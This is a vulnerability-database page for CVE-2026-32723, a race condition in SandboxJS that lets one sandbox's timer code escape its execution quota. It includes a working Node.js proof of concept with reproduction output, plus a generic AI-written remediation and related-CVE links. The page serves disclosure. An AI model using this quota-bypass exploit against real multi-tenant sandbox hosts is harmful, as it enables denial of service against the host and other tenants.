Skip to main content

Node.js CVE-2026-32723

MEDIUM
Race Condition (CWE-362)
2026-03-16 https://github.com/nyariv/SandboxJS GHSA-7p5m-xrh7-769r
Share

Lifecycle Timeline

3
Analysis Generated
Mar 16, 2026 - 17:20 vuln.today
Patch released
Mar 16, 2026 - 17:20 nvd
Patch available
CVE Published
Mar 16, 2026 - 16:43 nvd
MEDIUM

DescriptionCVE.org

Summary

Assumed repo path is /Users/zwique/Downloads/SandboxJS-0.8.34 (no /Users/zwique/Downloads/SandboxJS found). A global tick state (currentTicks.current) is shared between sandboxes. Timer string handlers are compiled at execution time using that global tick state rather than the scheduling sandbox's tick object. In multi-tenant / concurrent sandbox scenarios, another sandbox can overwrite currentTicks.current between scheduling and execution, causing the timer callback to run under a different sandbox's tick budget and bypass the original sandbox's execution quota/watchdog.

Impact: execution quota bypass → CPU/resource abuse

---

Details

  • Affected project: SandboxJS (owner: nyariv)
  • Assumed checked-out version: SandboxJS-0.8.34 at /Users/zwique/Downloads/SandboxJS-0.8.34

Vulnerable code paths

  • /src/eval.ts - sandboxFunction binds ticks using ticks || currentTicks.current:
  createFunction(..., ticks || currentTicks.current, { ...context, ... })

Relevant lines: 44, 53, 164, 167.

  • /src/evaluator.ts / /src/executor.ts - global ticks:
  export const currentTicks = { current: { ticks: BigInt(0) } as Ticks };

and

  _execNoneRecurse(...) { currentTicks.current = ticks; ... }

Relevant lines: ~1700, 1712.

  • sandboxedSetTimeout compiles string handlers at execution time, not at scheduling time, which lets currentTicks.current be the wrong sandbox's ticks when compilation occurs.

---

Why This Is Vulnerable

  • currentTicks.current is global mutable state shared across all sandbox instances.
  • Timer string handlers are compiled at the moment the timer fires and read currentTicks.current at that time. If another sandbox runs between scheduling and execution, it can replace currentTicks.current. The scheduled timer's code will be compiled/executed with the other sandbox's tick budget. This allows the original sandbox's execution quota to be bypassed.

---

Proof of Concept

> Run with Node.js; adjust path if needed.

js
// PoC (run with node); adjust path if needed
import Sandbox from '/Users/zwique/Downloads/SandboxJS-0.8.34/node_modules/@nyariv/sandboxjs/build/Sandbox.js';

const globals = { ...Sandbox.SAFE_GLOBALS, setTimeout, clearTimeout };
const prototypeWhitelist = Sandbox.SAFE_PROTOTYPES;

const sandboxA = new Sandbox({
  globals,
  prototypeWhitelist,
  executionQuota: 50n,
  haltOnSandboxError: true,
});
let haltedA = false;
sandboxA.subscribeHalt(() => { haltedA = true; });

const sandboxB = new Sandbox({ globals, prototypeWhitelist });

// Sandbox A schedules a heavy string handler
sandboxA.compile(
  'setTimeout("let x=0; for (let i=0;i<200;i++){ x += i } globalThis.doneA = true;", 0);'
)().run();

// Run sandbox B before A's timer fires
sandboxB.compile('1+1')().run();

setTimeout(() => {
  console.log({ haltedA, doneA: sandboxA.context.sandboxGlobal.doneA });
}, 50);

Reproduction Steps

  1. Place the PoC in hi.js and run:
   node /Users/zwique/Downloads/SandboxJS-0.8.34/hi.js
  1. Observe output similar to:
   { haltedA: false, doneA: true }

This indicates the heavy loop completed and the quota was bypassed.

  1. Remove the sandboxB.compile('1+1')().run(); line and rerun. Output should now be:
   { haltedA: true }

This indicates quota enforcement is working correctly.

---

Impact

  • Type: Runtime guard bypass (execution-quota / watchdog bypass)
  • Who is impacted: Applications that run multiple SandboxJS instances concurrently in the same process - multi-tenant interpreters, plugin engines, server-side scripting hosts, online code runners.
  • Practical impact: Attackers controlling sandboxed code can bypass configured execution quotas/watchdog and perform CPU-intensive loops or long-running computation, enabling resource exhaustion/DoS or denial of service against the host process or other tenants.
  • Does not (as tested) lead to: Host object exposure or direct sandbox escape (no process / require leakage observed from this primitive alone). Escalation to RCE was attempted and not observed.

AnalysisAI

SandboxJS 0.8.34 contains a race condition where a shared global tick state allows concurrent sandboxes to interfere with each other's execution quotas during timer callback compilation. An attacker in a multi-tenant environment can exploit this to bypass resource limits and exhaust CPU/memory on the host system. A patch is available.

Technical ContextAI

A race condition occurs when the behavior of software depends on the timing of events, such as the order of execution of threads or processes.

RemediationAI

A vendor patch is available — apply it immediately. Use proper synchronization mechanisms (locks, mutexes, atomic operations). Implement file locking for filesystem operations. Avoid TOCTOU patterns.

CVE-2024-55591 CRITICAL POC
9.8 Jan 14

FortiOS and FortiProxy contain an authentication bypass via the Node.js websocket module allowing unauthenticated remote

CVE-2014-7205 CRITICAL POC
10.0 Oct 08

Eval injection vulnerability in the internals.batch function in lib/batch.js in the bassmaster plugin before 1.5.2 for t

CVE-2025-59528 CRITICAL POC
10.0 Sep 22

Flowise version 3.0.5 contains a remote code execution vulnerability in the CustomMCP node. The mcpServerConfig paramete

CVE-2017-14849 HIGH POC
7.5 Sep 28

Node.js 8.5.0 before 8.6.0 allows remote attackers to access unintended files, because a change to ".." handling was inc

CVE-2017-5941 CRITICAL POC
9.8 Feb 09

An issue was discovered in the node-serialize package 0.0.4 for Node.js. Rated critical severity (CVSS 9.8), this vulner

CVE-2014-3744 HIGH POC
7.5 Oct 23

Directory traversal vulnerability in the st module before 0.2.5 for Node.js allows remote attackers to read arbitrary fi

CVE-2014-9566 HIGH POC
7.5 Mar 10

Multiple SQL injection vulnerabilities in the Manage Accounts page in the AccountManagement.asmx service in the Solarwin

CVE-2013-4660 MEDIUM POC
6.8 Jun 28

The JS-YAML module before 2.0.5 for Node.js parses input without properly considering the unsafe !!js/function tag, whic

CVE-2015-5688 MEDIUM POC
5.0 Sep 04

Directory traversal vulnerability in lib/app/index.js in Geddy before 13.0.8 for Node.js allows remote attackers to read

CVE-2026-45321 CRITICAL POC
9.6 May 12

Credential-harvesting malware compromised 84 versions of 42 TanStack npm packages on 2026-05-11 via chained GitHub Actio

CVE-2014-7192 CRITICAL POC
10.0 Dec 11

Eval injection vulnerability in index.js in the syntax-error package before 1.1.1 for Node.js 0.10.x, as used in IBM Rat

CVE-2013-4450 MEDIUM POC
5.0 Oct 21

The HTTP server in Node.js 0.10.x before 0.10.21 and 0.8.x before 0.8.26 allows remote attackers to cause a denial of se

Share

CVE-2026-32723 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy